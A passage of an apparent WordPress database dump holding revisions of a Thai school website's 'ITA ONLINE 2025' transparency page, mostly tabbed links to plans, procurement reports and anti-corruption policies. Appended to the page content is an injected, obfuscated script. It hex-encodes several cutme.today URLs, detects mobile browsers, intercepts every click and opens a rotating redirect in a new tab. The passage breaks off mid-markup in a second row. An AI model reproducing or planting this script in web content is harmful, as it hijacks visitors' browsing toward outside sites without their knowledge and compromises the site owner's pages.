class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"size\":16,\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1558\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1502\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-07-08 10:56:50','2025-07-08 03:56:50','',871,'http://pakhaeng.ssk.in.th/?p=1758',0,'revision','',0),
(1759,1,'2025-07-08 11:16:12','2025-07-08 04:16:12','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery 